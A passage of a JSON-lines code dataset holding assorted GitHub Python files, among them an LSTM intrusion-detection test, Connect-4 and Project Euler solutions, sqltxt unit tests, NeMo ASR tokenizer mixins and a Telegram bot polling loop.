np.array([0,0,0,0,0,0,0,-48,0,-15.0234742,0,0,0,0,0,0,-3276.8,0,0,0])\nxmax = np.array([3,99.6094,16383.75,99.6094,99.6094,254,3,143.25,3,104.6948357,99.603,25.8984375,99.609375,99.609375,99.609375,99.609375,3276.8,1016,15,15])\nxptp = xmax - xmin\ntrainX = (trainX - xmin) / xptp\ntestX = (testX - xmin) / xptp\n\nshape = np.shape(trainX)\ntrainX = trainX.reshape(shape[0],1,shape[1])\nshape = np.shape(trainy)\ntrainy = trainy.reshape(shape[0],1)\nshape = np.shape(testX)\ntestX = testX.reshape(1,1,shape[0])\nshape = np.shape(testy)\nprint(shape)\ntesty = testy.reshape(1,1)\n\n# fit and evaluate a model\n\nepochs, batch_size, n_neurons, dropout = 50, 128, 50, 0.5\nn_timesteps, n_features, n_outputs = trainX.shape[1], trainX.shape[2], trainy.shape[1]\nmodel = Sequential()\nmodel.add(LSTM(n_neurons, input_shape=(n_timesteps,n_features)))\nmodel.add(Dropout(dropout))\nmodel.add(Dense(n_neurons, activation='relu'))\nmodel.add(Dense(n_outputs, activation='sigmoid'))\nmodel.compile(loss='binary_crossentropy', optimizer='adam', metrics=['binary_accuracy', km.binary_precision(), km.binary_recall(), km.binary_true_positive(), km.binary_false_positive(), km.binary_true_negative(), km.binary_false_negative()])\n# fit network\nmodel.fit(trainX, trainy, epochs=epochs, batch_size=batch_size, verbose=1)\n# evaluate model\n_, ba, pr, rec, tp, fp, tn, fn = model.evaluate(testX, testy, batch_size=batch_size, verbose=0)\nstart_eval = time.time()\nout = model.predict_classes(testX)\nend_eval = time.time() - start_eval\nprint(end_eval)\n#print(ba, pr, rec, end_eval)\n#print(hist.history)\n","repo_name":"zadid56/in-vehicle-security","sub_path":"scripts/lstm_class_test.py","file_name":"lstm_class_test.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33522920976","text":"from LL.LL_SetPilot import SetPilot\n\nimport csv\n\nclass SetPilot_file:\n\n def set_Pilot_file(self, other):\n with open('Crew.csv', 'a', newline='') as destination_file:\n wr = csv.writer(destination_file, dialect='excel')\n wr.writerow(other)\n\nif __name__ == \"__main__\":\n SetPilot_file().set_Pilot_file(SetPilot().setpilot())","repo_name":"gunnsa/Nan_Air_hopur20","sub_path":"Glósur/IO_SetPilot.py","file_name":"IO_SetPilot.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20073297644","text":"# AI for Games - Beat the Snake game\r\n# Testing the AI\r\n\r\n# Importing the libraries\r\nimport enviroment as env\r\nfrom brain import Brain\r\nimport pygame as pg\r\nimport numpy as np\r\nimport random\r\nimport math\r\n\r\n# Defining the parameters\r\nnLastStates = 4\r\nfilepathToOpen = 'model_data/test1.h5'\r\nslowdown = 75\r\n\r\n# Creating the Environment and the Brain\r\nenv = env.Enviroment(\"test\")\r\nbrain = Brain((6, 7, nLastStates))\r\nmodel = brain.loadModel(filepathToOpen)\r\n\r\n\r\n# Initializing the pygame window\r\nenv.drawScreen()\r\n\r\n# Making a function that will reset game states\r\ndef resetStates():\r\n currentState = np.zeros((1, 6, 7, nLastStates))\r\n \r\n for i in range(nLastStates):\r\n currentState[:,:,:,i] = env.getBoard()\r\n \r\n return currentState, currentState\r\n\r\n# Starting the main loop\r\nwhile True:\r\n # Resetting the game and the game states\r\n env.reset()\r\n currentState, nextState = resetStates()\r\n gameOver = False\r\n \r\n # Playing the game\r\n while not gameOver: \r\n\r\n # Choosing an 
action to play\r\n valid_moves = env.getValidMoves()\r\n\r\n # else, choose the action with the highest q-value, but only from the valid moves\r\n\r\n qvalues = model.predict(currentState)\r\n print(\"valid moves: \", valid_moves)\r\n print(\"qvalues: \", qvalues)\r\n \r\n # remove the q-values for invalid moves by setting invalid moves to negative infinity\r\n for i in range(7):\r\n if i not in valid_moves:\r\n qvalues[0][i] = -math.inf\r\n\r\n print(\"new qvalues: \", qvalues)\r\n action = np.argmax(qvalues[0])\r\n print(\"action: \", action)\r\n \r\n # Updating the environment\r\n\r\n # make the ai move\r\n state, reward_1, gameOver = env.tryMove(action, 1)\r\n \r\n # Adding new game frame to next state and deleting the oldest one from next state\r\n state = np.reshape(state, (1, env.nRows, env.nColumns, 1))\r\n nextState = np.append(nextState, state, axis = 3)\r\n nextState = np.delete(nextState, 0, axis = 3)\r\n \r\n # Updating current state\r\n currentState = nextState\r\n\r\n # Displaying the game\r\n env.drawScreen()\r\n env.display()\r\n\r\n # get the player's move, filtering for valid moves\r\n valid_moves = env.getValidMoves()\r\n action = None\r\n while action not in valid_moves:\r\n for event in pg.event.get():\r\n if event.type == pg.QUIT:\r\n pg.quit()\r\n exit()\r\n if event.type == pg.KEYDOWN:\r\n if event.key == pg.K_1:\r\n action = 0\r\n if event.key == pg.K_2:\r\n action = 1\r\n if event.key == pg.K_3:\r\n action = 2\r\n if event.key == pg.K_4:\r\n action = 3\r\n if event.key == pg.K_5:\r\n action = 4\r\n if event.key == pg.K_6:\r\n action = 5\r\n if event.key == pg.K_7:\r\n action = 6\r\n\r\n\r\n # make the player's move\r\n state, reward_2, gameOver = env.tryMove(action, 2)\r\n \r\n \r\n env.drawScreen()\r\n env.display()\r\n\r\n # Slow down the game\r\n pg.time.wait(slowdown)\r\n","repo_name":"JonathanBergen/sattler-coursework","sub_path":"light-blue-connect4/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8342126876","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('user/', include('authentication.urls')),\n path('our-team/', include('our_team.urls')),\n path('review/', include('client_review.urls')),\n path('contact/', include('contact_us.urls')),\n path('slider/', include('homepage_slider.urls')),\n path('promotion/', include('promotion.urls')),\n path('service/', include('service.urls')),\n path('project/', include('catkin_project.urls'))\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"sharif181/catkin","sub_path":"catkin/core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43492351566","text":"def read_file(FileName: str, SpeciesName: str):\n \"\"\"Will take in a histogram.dat (single-species) and turn it into a list of lists\n\n Args:\n FileName (str): Path to the histogram.dat file\n SpeciesName (str): The name of the specific species you want to examine. Should be in the .dat file.\n\n Returns:\n list of lists: Has many lists, where each sub-list is a new time stamp that includes time at list[i][0]. You can find list \n of number of each complex type in list[i][1]. 
The number of species in each complex is listed in list[i][2].\n    \"\"\"\n    \n    #general vars \n    hist = [] # main list that holds each timestamp\n    hist_temp = [] # holds all info in 1 timestamp.\n    hist_conv = [] # number of species in this complex type at 1 timestamp\n    hist_count = [] # num of this complex type at 1 timestamp\n    \n    #reads through the file\n    with open(FileName, 'r') as file:\n        for line in file.readlines():\n            \n            #determining what the line holds\n            if line[0:4] == 'Time':\n                \n                #if this is NOT the first run, add the temp lists to the main list\n                if hist_count != [] and hist_conv != []:\n                    hist_temp.append(hist_count)\n                    hist_temp.append(hist_conv)\n                    hist.append(hist_temp)\n                \n                #reset the temp lists\n                hist_count = []\n                hist_conv = []\n                hist_temp = []\n\n                #set time to start of new temp list\n                hist_temp.append(float(line.strip('Time (s): ')))\n            \n            #if the line holds species information\n            else:\n\n                #split the line and determine if it has the right species name\n                string = '\t' + str(SpeciesName) + ': '\n                line = line.strip('. \\n').split(string)\n                if len(line) != 2:\n                    raise Exception('invalid species name')\n                \n                #adds values to the sub-temp lists\n                else:\n                    hist_count.append(int(line[0]))\n                    hist_conv.append(int(line[1]))\n    \n    #if it is the last run, add it in (needs to be here b/c temps are added at start of new time, not end of previous time)\n    hist_temp.append(hist_count)\n    hist_temp.append(hist_conv)\n    hist.append(hist_temp)\n    \n    return hist\n\n\n","repo_name":"mjohn218/io_nerdss","sub_path":"ioNERDSSPyPi/ioNERDSS/functions/histograms/single_species/read_file.py","file_name":"read_file.py","file_ext":"py","file_size_in_byte":2417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"17919089233","text":"import logging\nimport logging.handlers\n\nlog_formatter = logging.Formatter('%(asctime)s %(levelname)s %(module)s %(message)s')\n\nlog_file_handler = logging.handlers.RotatingFileHandler('pokemon.log', maxBytes=1024*1024, backupCount=10)\nlog_file_handler.setLevel(logging.INFO)\nlog_file_handler.setFormatter(log_formatter)\n\nlog_console_handler = logging.StreamHandler()\nlog_console_handler.setLevel(logging.INFO)\nlog_console_handler.setFormatter(log_formatter)\n\n\ndef configure_logger(name):\n    logger = logging.getLogger(name)\n    logger.setLevel(logging.INFO)\n    logger.addHandler(log_file_handler)\n    logger.addHandler(log_console_handler)\n    return logger\n","repo_name":"hflabs/pokemon","sub_path":"server/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"48"}
+{"seq_id":"30112821493","text":"def spy_game(nums):\n    code = [0,0,7]\n    pointer = 0\n    for num in nums:\n        if pointer == 3:\n            return True\n        if num == code[pointer] and pointer < 3:\n            pointer += 1\n    return pointer > 2\n\n# Check\nprint(spy_game([1,2,4,0,0,7,5]))\nprint(spy_game([1,0,2,4,0,5,7]))\nprint(spy_game([1,7,2,0,4,5,0]))\n\n\ndef count_primes(num):\n    list_primes = [2]\n    count = 3\n    while count <= num:\n        for i in list_primes:\n            if count % i == 0:\n                count += 2\n                break\n        else:\n            list_primes.append(count)\n            count += 2\n    print(list_primes)\n    return len(list_primes)\n\n\n# Check\nprint(count_primes(100))","repo_name":"JAntonioMarin/PythonBootcamp","sub_path":"Section6/48.py","file_name":"48.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"42698535191","text":"import functools\nimport asyncio as aio\nimport typer\nimport traceback\n\ndef blocking_run(f):\n\t@functools.wraps(f)\n\tdef block_fn(*args, **kwargs):\n\t\taio.run(f(*args, **kwargs))\n\treturn block_fn\n\ndef catch_error(f):\n\t@functools.wraps(f)\n\tdef smooth(*args, **kwargs):\n\t\ttry:\n\t\t\tf(*args, **kwargs)\n\t\texcept Exception as e:\n\t\t\ttyper.secho(f\"Failure: {e}\", fg=typer.colors.RED, err=True)\n\t\t\tshow_tb = typer.prompt(f\"See full traceback? ([y, yes]/[n, any])\", default=\"n\").lower() in [\"y\", \"yes\"]\n\t\t\tif show_tb:\n\t\t\t\ttraceback.print_exc()\n\t\t\telse:\n\t\t\t\traise typer.Abort()\n\treturn smooth\n\n\n","repo_name":"ankitsainidev/nkit","sub_path":"nkit/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14883260146","text":"import re\n\nfrom tqdm import tqdm\n\nINPUT_TXT = \"input.txt\"\n# INPUT_TXT = \"input-small.txt\"\n\n\nVAR_NAMES = set(\"wxyz\")\n\n\ndef solve_part1(lines):\n # move imp lines to the bottom\n index = 0\n while True:\n line = lines[index]\n if line == \"inp w\":\n next_line = lines[index + 1]\n if \"w\" not in next_line.split(\" \", 1)[1]:\n lines[index + 1] = line\n lines[index] = next_line\n index += 1\n if index == len(lines):\n break\n\n # merge mul 0 and add\n index = 0\n while True:\n line = lines[index]\n m = re.match(\"mul (.) 0\", line)\n if m:\n variable_name = m.group(1)\n next_line = lines[index + 1]\n mm = re.match(f\"add {variable_name} (.*)\", next_line)\n if mm:\n addition = mm.group(1)\n lines[index + 1] = f\"set {variable_name} {addition}\"\n del lines[index]\n\n index += 1\n if index == len(lines) - 1:\n break\n\n # merge eql eql\n index = 0\n while True:\n line = lines[index]\n if line == \"eql x w\" and lines[index + 1] == \"eql x 0\":\n lines[index + 1] = \"neql x w\"\n del lines[index]\n index += 1\n if index == len(lines) - 1:\n break\n #\n # # drop add 0\n # lines = list(filter(lambda x: not re.match(\"add . 0$\", x), lines))\n\n # drop div 1\n lines = list(filter(lambda x: not re.match(\"div . 
1$\", x), lines))\n\n with open(\"new-input.txt\", \"w\") as out:\n for line in lines:\n out.write(line + \"\\n\")\n\n # block by input reads\n indices = []\n for i, line in enumerate(lines):\n if line == \"inp w\":\n indices.append(i)\n indices.append(len(lines))\n blocks = []\n for i, j in zip(indices, indices[1:]):\n blocks.append(lines[i + 1 : j])\n pre_input_block = lines[: indices[0]]\n\n # pre-input\n state = {v: 0 for v in VAR_NAMES}\n apply_steps(state, pre_input_block)\n print(\"pre input state:\", sorted(state))\n\n ranges = find_ranges(blocks)\n print(ranges)\n output = check(state, blocks, 0, ranges)\n print(output)\n\n\ndef check(start_state, blocks, block_index, ranges):\n if not blocks:\n return start_state[\"z\"] == 0\n\n vals = range(9, 0, -1)\n if len(blocks) > 10:\n vals = tqdm(vals, desc=str(len(blocks)) + \" \" * (14 - len(blocks)))\n for inp in vals:\n state = {**start_state, \"w\": inp}\n apply_steps(state, blocks[0])\n\n if block_index + 1 in ranges and state[\"z\"] % 26 not in ranges[block_index + 1]:\n continue\n\n ch = check(state, blocks[1:], block_index + 1, ranges)\n if ch:\n return inp + ch\n\n\ndef apply_steps(state, block):\n for step in block:\n make_step(state, step)\n\n\ndef make_step(state, step):\n spl = step.split(\" \")\n command = spl[0]\n target = spl[1]\n if command == \"add\":\n state[target] += other(spl, state)\n elif command == \"mul\":\n state[target] *= other(spl, state)\n elif command == \"div\":\n state[target] //= other(spl, state)\n elif command == \"mod\":\n state[target] %= other(spl, state)\n elif command == \"eql\":\n state[target] = 1 if state[target] == other(spl, state) else 0\n elif command == \"neql\":\n state[target] = 1 if state[target] != other(spl, state) else 0\n elif command == \"set\":\n state[target] = other(spl, state)\n else:\n raise Exception(\"Unknown command \", command)\n\n\ndef other(spl, values):\n other = spl[2]\n return values[other] if other in VAR_NAMES else int(other)\n\n\ndef find_ranges(blocks):\n ranges = {}\n for i, block in enumerate(blocks):\n for line in block:\n m = re.match(\"add x ([^z]+)\", line)\n if m:\n num = int(m.group(1))\n if num <= 9:\n r1 = 1 - num\n r2 = 9 - num\n ranges[i] = range(min(r1, r2), max(r1, r2) + 1)\n return ranges\n\n\ndef main():\n with open(INPUT_TXT) as f:\n lines = [line.strip() for line in f.readlines()]\n print(f\"{len(lines)} read\")\n\n result_part1 = solve_part1(lines)\n result_part2 = 0\n\n # TODO:\n # - drop DIV x 1\n # - drop ADD x 0\n # - merge eql, eql into nql\n # - merge mul x 0, add x y -> set x y\n\n print()\n print(\"##########\")\n print(f\"Result part 1: {result_part1}\")\n print(f\"Result part 2: {result_part2}\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"mkopec87/advent_of_code","sub_path":"src/2021/day24/main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":4516,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"4670508285","text":"import unittest\nimport os\nfrom sqltxt.table import Table \nfrom sqltxt.column import Column, ColumnName, AmbiguousColumnNameError\nfrom sqltxt.expression import Expression\n\nclass TableTest(unittest.TestCase):\n\n def setUp(self):\n\n self.data_path = os.path.join(os.path.dirname(__file__), '../data')\n\n table_header = [\"col_a\", \"col_b\"]\n table_contents = \"\"\"1,1\n2,3\n3,2\"\"\"\n\n self.table_a = Table.from_cmd(\n name = 'table_a', \n cmd = 'echo -e \"{0}\"'.format(table_contents), \n columns = table_header\n )\n\n 
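# fixture note (added): table_b below shares col_a values (1 and 2) with table_a's rows\n        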
table_header = [\"col_a\", \"col_b\"]\n table_contents = \"\"\"1,w\n2,x\n2,y\n5,z\"\"\"\n\n self.table_b = Table.from_cmd(\n name = 'table_b', \n cmd = 'echo -e \"{0}\"'.format(table_contents), \n columns = table_header\n )\n\n def test_subset_rows(self):\n \n conditions = [\n [Expression('col_b', '==', '1'), 'or', Expression('col_a', '==', '2')]\n ]\n self.table_a.subset_rows(conditions)\n \n cmds_actual = self.table_a.cmds\n cmds_expected = [\n 'echo -e \"1,1\\n2,3\\n3,2\"',\n \"awk -F',' 'OFS=\\\",\\\" { if (($2 == 1 || $1 == 2)) { print $1,$2 } }'\"]\n self.assertEqual(cmds_actual, cmds_expected)\n\n def test_order_columns(self):\n\n col_name_order = [ColumnName('col_b'), ColumnName('col_a')]\n self.table_a.order_columns(col_name_order)\n \n cmds_actual = self.table_a.cmds\n cmds_expected = ['echo -e \"1,1\\n2,3\\n3,2\"', \"awk -F',' 'OFS=\\\",\\\" { print $2,$1 }'\"]\n self.assertEqual(cmds_actual, cmds_expected)\n\n def test_sort(self):\n \n sort_by_col_names = [ColumnName('col_a'), ColumnName('col_b')]\n self.table_a.sort(sort_by_col_names)\n\n cmds_actual = self.table_a.cmds\n cmds_expected = ['echo -e \"1,1\\n2,3\\n3,2\"', \"sort -t, -k 1,1 -k 2,2\"]\n self.assertEqual(cmds_actual, cmds_expected)\n\n sort_by_cols = [self.table_a.get_column_for_name(cn) for cn in sort_by_col_names]\n self.assertEqual(self.table_a.sorted_by, sort_by_cols)\n\n def test_is_sorted_by(self):\n\n table_from_cmd = Table.from_cmd(\n name = 'table_a', \n cmd = 'echo -e \"\"',\n columns = ['col_a', 'col_b'])\n\n table_from_cmd.sorted_by = [Column('table_a.col_a'), Column('table_a.col_b')]\n\n self.assertTrue(table_from_cmd.is_sorted_by([0]))\n self.assertFalse(table_from_cmd.is_sorted_by([1]))\n self.assertTrue(table_from_cmd.is_sorted_by([0,1]))\n\n def test_get_column_for_name_raises_on_ambiguity(self):\n\n table_from_cmd = Table.from_cmd(\n name = 'table_a', \n cmd = 'echo -e \"\"',\n columns = ['col_a', 'col_a'])\n\n with self.assertRaisesRegexp(AmbiguousColumnNameError, 'Ambiguous column reference'):\n table_from_cmd.get_column_for_name(ColumnName('col_a'))\n\n table_from_cmd = Table.from_cmd(\n name = 'table_a', \n cmd = 'echo -e \"\"',\n columns = ['ta.col_a', 'tb.col_a'])\n\n with self.assertRaisesRegexp(AmbiguousColumnNameError, 'Ambiguous column reference'):\n table_from_cmd.get_column_for_name(ColumnName('col_a'))\n\n first_column = Column('ta.col_a')\n first_column.add_name('col_alpha')\n second_column = Column('tb.col_a')\n table_from_cmd = Table.from_cmd(\n name = 'table_a', \n cmd = 'echo -e \"\"',\n columns = [first_column, second_column])\n\n with self.assertRaisesRegexp(AmbiguousColumnNameError, 'Ambiguous column reference'):\n table_from_cmd.get_column_for_name(ColumnName('col_a'))\n\n def test_sample_rows(self):\n self.table_a.sample_rows(1)\n cmds_actual = self.table_a.cmds\n cmds_expected = ['echo -e \"1,1\\n2,3\\n3,2\"',\n \"\"\"awk -v seed=$RANDOM -v n={0} '\n BEGIN {{ srand(seed) }}\n NR <= n {{ reservoir[NR] = $0 }}\n NR > n {{ M = int(rand() * NR) + 1; if (M <= n) {{ reservoir[M] = $0 }}}}\n END {{ for (key in reservoir) {{ print reservoir[key] }}}}'\"\"\".format(1)\n ]\n self.assertEqual(cmds_actual, cmds_expected)\n\n def test_get_cmd_str(self):\n\n table_from_file = Table.from_file_path(os.path.join(self.data_path, 'table_a.txt'))\n\n # output from a file-backed Table to STDOUT\n cmd_actual = table_from_file.get_cmd_str()\n cmd_expected = 'tail -n+2 {}/table_a.txt'.format(self.data_path)\n self.assertEqual(cmd_actual, cmd_expected)\n\n table_from_cmd = Table.from_cmd(\n 
'table_a', \n cmd = 'echo -e \"1,2,3,4\"', \n columns = ['col_a', 'col_b', 'col_c', 'col_d'])\n\n # output from a command-backed Table to STDOUT\n cmd_actual = table_from_cmd.get_cmd_str()\n cmd_expected = 'echo -e \"1,2,3,4\"'\n self.assertEqual(cmd_actual, cmd_expected)\n\n # add a command, then output\n table_from_cmd.cmds += ['sort']\n\n # to STDOUT\n cmd_actual = table_from_cmd.get_cmd_str()\n cmd_expected = 'echo -e \"1,2,3,4\" | sort'\n self.assertEqual(cmd_actual, cmd_expected)\n","repo_name":"shahin/sqltxt","sub_path":"tests/unit/table_test.py","file_name":"table_test.py","file_ext":"py","file_size_in_byte":5179,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"29764458504","text":"import os\nfrom abc import ABC, abstractmethod\nfrom typing import List\n\nfrom omegaconf import DictConfig, OmegaConf, open_dict\n\nfrom nemo.collections.asr.parts.utils import asr_module_utils\nfrom nemo.collections.common import tokenizers\nfrom nemo.utils import logging\n\n\nclass ASRBPEMixin(ABC):\n \"\"\" ASR BPE Mixin class that sets up a Tokenizer via a config\n\n This mixin class adds the method `_setup_tokenizer(...)`, which can be used by ASR models\n which depend on subword tokenization.\n\n The setup_tokenizer method adds the following parameters to the class -\n - tokenizer_cfg: The resolved config supplied to the tokenizer (with `dir` and `type` arguments).\n - tokenizer_dir: The directory path to the tokenizer vocabulary + additional metadata.\n - tokenizer_type: The type of the tokenizer. Currently supports `bpe` and `wpe`.\n - vocab_path: Resolved path to the vocabulary text file.\n\n In addition to these variables, the method will also instantiate and preserve a tokenizer\n (subclass of TokenizerSpec) if successful, and assign it to self.tokenizer.\n \"\"\"\n\n def _setup_tokenizer(self, tokenizer_cfg: DictConfig):\n # Prevent tokenizer parallelism (unless user has explicitly set it)\n if 'TOKENIZERS_PARALLELISM' not in os.environ:\n os.environ['TOKENIZERS_PARALLELISM'] = 'false'\n\n self.tokenizer_cfg = OmegaConf.to_container(tokenizer_cfg, resolve=True) # type: dict\n self.tokenizer_dir = self.tokenizer_cfg.pop('dir') # Remove tokenizer directory\n self.tokenizer_type = self.tokenizer_cfg.pop('type').lower() # Remove tokenizer_type\n\n self.hf_tokenizer_kwargs = self.tokenizer_cfg.pop(\"hf_kwargs\", {}) # Remove HF tokenizer kwargs\n\n # Preserve config\n if hasattr(self, 'cfg') and 'tokenizer' in self.cfg:\n self.cfg.tokenizer.dir = self.tokenizer_dir\n self.cfg.tokenizer.type = self.tokenizer_type\n\n if 'hf_kwargs' in tokenizer_cfg:\n with open_dict(self.cfg.tokenizer):\n self.cfg.tokenizer.hf_kwargs = tokenizer_cfg.get('hf_kwargs')\n\n if self.tokenizer_type not in ['bpe', 'wpe']:\n raise ValueError(\n \"`tokenizer.type` must be either `bpe` for SentencePiece tokenizer or \"\n \"`wpe` for BERT based tokenizer\"\n )\n\n if self.tokenizer_type == 'bpe':\n # This is a BPE Tokenizer\n if 'model_path' in self.tokenizer_cfg:\n model_path = self.tokenizer_cfg.get('model_path')\n else:\n model_path = os.path.join(self.tokenizer_dir, 'tokenizer.model')\n model_path = self.register_artifact('tokenizer.model_path', model_path)\n self.model_path = model_path\n\n if 'special_tokens' in self.tokenizer_cfg:\n special_tokens = self.tokenizer_cfg['special_tokens']\n\n if special_tokens is not None:\n raise ValueError(\"`special_tokens` are no longer supported for SentencePiece based tokenizers.\")\n\n # Update special tokens\n 
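# build the SentencePiece tokenizer from the registered model file; vocabulary helpers are attached to it below\n            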
self.tokenizer = tokenizers.SentencePieceTokenizer(model_path=model_path)\n\n if 'vocab_path' in self.tokenizer_cfg:\n vocab_path = self.tokenizer_cfg.get('vocab_path')\n else:\n vocab_path = os.path.join(self.tokenizer_dir, 'vocab.txt')\n vocab_path = self.register_artifact('tokenizer.vocab_path', vocab_path)\n self.vocab_path = vocab_path\n\n try:\n if 'spe_tokenizer_vocab' in self.tokenizer_cfg:\n spe_vocab_path = self.tokenizer_cfg.get('spe_tokenizer_vocab')\n else:\n spe_vocab_path = os.path.join(self.tokenizer_dir, 'tokenizer.vocab')\n spe_vocab_path = self.register_artifact('tokenizer.spe_tokenizer_vocab', spe_vocab_path)\n self.spe_vocab_path = spe_vocab_path\n except FileNotFoundError:\n # fallback case for older checkpoints that did not preserve the tokenizer.vocab\n self.spe_vocab_path = None\n\n vocabulary = {}\n for i in range(self.tokenizer.vocab_size):\n piece = self.tokenizer.ids_to_tokens([i])\n piece = piece[0]\n vocabulary[piece] = i + 1\n\n # wrapper method to get vocabulary conveniently\n def get_vocab():\n return vocabulary\n\n # attach utility values to the tokenizer wrapper\n self.tokenizer.tokenizer.vocab_size = len(vocabulary)\n self.tokenizer.tokenizer.get_vocab = get_vocab\n self.tokenizer.tokenizer.all_special_tokens = self.tokenizer.special_token_to_id\n\n else:\n # This is a WPE Tokenizer\n # If path from previous registration exists, remove it\n if 'vocab_path' in self.tokenizer_cfg:\n vocab_path = self.tokenizer_cfg.get('vocab_path')\n else:\n vocab_path = os.path.join(self.tokenizer_dir, 'vocab.txt')\n vocab_path = self.register_artifact('tokenizer.vocab_path', vocab_path)\n self.vocab_path = vocab_path\n\n # If path from previous registration exists, remove it\n if 'vocab_path' in self.tokenizer_cfg:\n self.tokenizer_cfg.pop('vocab_path')\n\n self.tokenizer = tokenizers.AutoTokenizer(\n pretrained_model_name='bert-base-cased',\n vocab_file=self.vocab_path,\n mask_token=self.hf_tokenizer_kwargs.get('mask_token', None),\n bos_token=self.hf_tokenizer_kwargs.get('bos_token', None),\n eos_token=self.hf_tokenizer_kwargs.get('eos_token', None),\n pad_token=self.hf_tokenizer_kwargs.get('pad_token', None),\n sep_token=self.hf_tokenizer_kwargs.get('sep_token', None),\n cls_token=self.hf_tokenizer_kwargs.get('cls_token', None),\n unk_token=self.hf_tokenizer_kwargs.get('unk_token', None),\n use_fast=self.hf_tokenizer_kwargs.get('use_fast', False),\n )\n\n logging.info(\n \"Tokenizer {} initialized with {} tokens\".format(\n self.tokenizer.__class__.__name__, self.tokenizer.vocab_size\n )\n )\n\n\nclass ASRModuleMixin(ABC):\n \"\"\"\n ASRModuleMixin is a mixin class added to ASR models in order to add methods that are specific\n to a particular instantiation of a module inside of an ASRModel.\n\n Each method should first check that the module is present within the subclass, and support additional\n functionality if the corresponding module is present.\n \"\"\"\n\n def change_conv_asr_se_context_window(self, context_window: int, update_config: bool = True):\n \"\"\"\n Update the context window of the SqueezeExcitation module if the provided model contains an\n `encoder` which is an instance of `ConvASREncoder`.\n\n Args:\n context_window: An integer representing the number of input timeframes that will be used\n to compute the context. 
Each timeframe corresponds to a single window stride of the\n                STFT features.\n\n                Say the window_stride = 0.01s, then a context window of 128 represents 128 * 0.01 s\n                of context to compute the Squeeze step.\n            update_config: Whether to update the config or not with the new context window.\n        \"\"\"\n        asr_module_utils.change_conv_asr_se_context_window(\n            self, context_window=context_window, update_config=update_config\n        )\n\n\nclass DiarizationMixin(ABC):\n    @abstractmethod\n    def diarize(self, paths2audio_files: List[str], batch_size: int = 1) -> List[str]:\n        \"\"\"\n        Takes paths to audio files and returns speaker labels\n        Args:\n            paths2audio_files: paths to audio fragment to be transcribed\n\n        Returns:\n            Speaker labels\n        \"\"\"\n        pass\n","repo_name":"Xianchao-Wu/nemo_bidecoder","sub_path":"collections/asr/parts/mixins/mixins.py","file_name":"mixins.py","file_ext":"py","file_size_in_byte":8033,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"}
+{"seq_id":"45082372836","text":"import asyncio\nfrom .methods import *\nfrom db.db import DB\nfrom .message_handler import message_handler\nfrom .callback_handler import callback_handler\n\nasync def check_updates(token, update):\n    if \"message\" in update:\n        await message_handler(token, update)\n    elif \"callback_query\" in update:\n        await callback_handler(token, update)\n    else:\n        pass\n\n\nasync def run(token):\n    try:\n        update_id = (await get_updates(token))[-1]['update_id']\n    except:\n        update_id = 0\n    \n    try:\n        bot_username = (await get_me(token))['username']\n    except KeyError:\n        return\n    \n    while True:\n        try:\n            if DB().get_user_bot(bot_username) is None:\n                return\n            \n            updates = await get_updates(token, update_id)\n            for update in updates:\n                if update_id < update['update_id']:\n                    update_id = update['update_id']\n                    await check_updates(token, update)\n            \n            \n            await asyncio.sleep(2)\n        except:\n            await asyncio.sleep(10)\n","repo_name":"olegtititele/tg_onlyfans","sub_path":"handlers/tg_user_bot/userbot.py","file_name":"userbot.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
+{"seq_id":"31383884234","text":"\"\"\"\r\nPrime summations\r\nProblem 77\r\n\r\nIt is possible to write ten as the sum of primes in exactly five different ways:\r\n\r\n7 + 3\r\n5 + 5\r\n5 + 3 + 2\r\n3 + 3 + 2 + 2\r\n2 + 2 + 2 + 2 + 2\r\n\r\nWhat is the first value which can be written as the sum of primes in over five thousand different ways?\r\n\r\nLink: https://projecteuler.net/problem=77\r\n\r\nDate solved:\r\n09/10/2022 \r\n\"\"\"\r\n\r\n\r\nANSWER = 71\r\n\r\n# imports\r\n\r\nfrom functools import lru_cache\r\n\r\nfrom maths.sequences.special_sequences import PrimesSeq\r\n\r\n# solution\r\n\r\n\r\nprimes = PrimesSeq().seq\r\n\r\n\r\n@lru_cache(100)\r\ndef H(n, a):\r\n    if a == n:\r\n        return 1\r\n    if a == 1:\r\n        return not n % 2\r\n    if a > n:\r\n        return 0\r\n\r\n    summation = 0\r\n    i = 0\r\n    p = primes[i]\r\n    while p <= a and p <= n - a:\r\n        summation += H(n - a, p)\r\n        i += 1\r\n        p = primes[i]\r\n\r\n    return summation\r\n\r\n\r\ndef f(n):\r\n\r\n    summation = 0\r\n    i = 0\r\n    p = primes[i]\r\n    while p <= n:\r\n        summation += H(n, p)\r\n        i += 1\r\n        p = primes[i]\r\n\r\n    return summation\r\n\r\n\r\ndef solution():\r\n\r\n    threshold = 5000\r\n\r\n    n = 2\r\n    while True:\r\n        if 